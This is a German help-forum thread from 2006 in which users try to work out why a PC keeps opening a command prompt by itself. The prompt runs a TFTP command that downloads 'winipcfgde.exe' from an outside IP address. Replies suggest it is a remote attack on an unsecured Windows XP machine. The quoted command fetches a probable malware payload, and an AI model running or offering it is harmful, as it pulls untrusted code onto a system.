Virus oder was?

Herbert_Leitner · 27. September 2006 um 22:16

Hallo!

Ich habe eine Maschine, wo von selbst immer wieder eine Eingabeaufforderung gestartet wird, und darin der Befehl:

tftp -i 80.6.193.15 get winipcfgde.exe

Scheinbar versucht ein Programme, per FTFT eine DAtei vom Server 80.6.193.15 down zu loaden.

Das kann doch nur ein Virus sein?
Ich habe versucht, mich selbst midem Server zu verbinden. Es findet aber keine Übertragung statt und auf der Festplatte gibt es keine datei mit dem Namen winipcfgde.exe.

Komisch, ich finde keine Einträge in den Autostartordnern und verschiedene Antivierenprogramme finden keinen Virus.

Was kann das sein?

Gruß und DAnk!
Herbert

Schorsch_de7743 · 27. September 2006 um 22:31

Was heisst

wo von selbst immer wieder

Bei jedem Systemstart, oder auch im laufenden Betrieb?

Gruss
Schorsch

Nino_Ziomek · 28. September 2006 um 12:36

Hallo

Welches Betriebssystem benutzt du ?

tftp -i 80.6.193.15

Gebe das ( 80.6.193.15 ) bei Google ein. Hier steht irgend etwas negatives. Den Text mußt du aus dem englischen übersetzten.

winipcfgde.exe

Hast du dich ev. verschrieben ? Gefunden habe ich das „winipcfg.exe“.
Auch hier gibt es zahlreiche Hinweise beim googlen. Vielleicht ist „winipcfgde.exe“ eine Variante von „winipcfg.exe“ ?
Die Frage könnte also wichtig sein : Welches Betriebssystem?

Gruß Nino

Irene_45c1aa · 1. Oktober 2006 um 17:33

Hallo,
klinke mich hier mal ein. Ich habe das gleiche Problem.
Bei mir kommt es z.B. im laufenden Betrieb.

Gruß
Irene

[Bei dieser Antwort wurde das Vollzitat nachträglich automatisiert entfernt]

Schorsch_de7743 · 1. Oktober 2006 um 23:55

klinke mich hier mal ein. Ich habe das gleiche Problem.
Bei mir kommt es z.B. im laufenden Betrieb.

So direkt kann ich mit deinen und Herberts Angaben eigentlich nichts anfangen. Aber in einem der Foren hier hatte vor kurzem ein User einen Link zu einem per ethereal erstellten Log seines eigenen Netzverkehrs gepostet, und aus diesem Log liessen sich Transaktionen erkennen, die beim angegriffenen PC (in genannten Fall war der PC des Users der Angreifer) genau in einem solchen Verhalten resultieren dürften.

Sollte auch hier ein derartiger Angriff vorliegen, würde dies bedeuten, dass dein PC in mehrfacher Hinsicht nicht hinreichend für die Nutzung im Internet gesichert ist. Weder ist die XP-Firewall aktiviert, noch ist das Administrator-Passwort sauber gesetzt noch sind die im lokalen Netz erforderlichen Dienste in anderer Weise (z. B. durch Nutzung eines Routers anstelle eines Modems) hinreichend gegenüber dem Internet abgeschottet.

Aber das sind Mutmaßungen, hilfreich wäre es, wenn auch du mittels ethereal ein Log mitschneiden und veröffentlichen könntest. Da solche Logs aber sehr gross werden, wäre auch die Benennung des exakten Zeitpunkts eines solchen Vorfalls sinnvoll, alternativ die Benennung der in der Eingabeaufforderung gezeigten IP-Adresse (die von der von Herbert genannten abweichen dürfte).

Gruss
Schorsch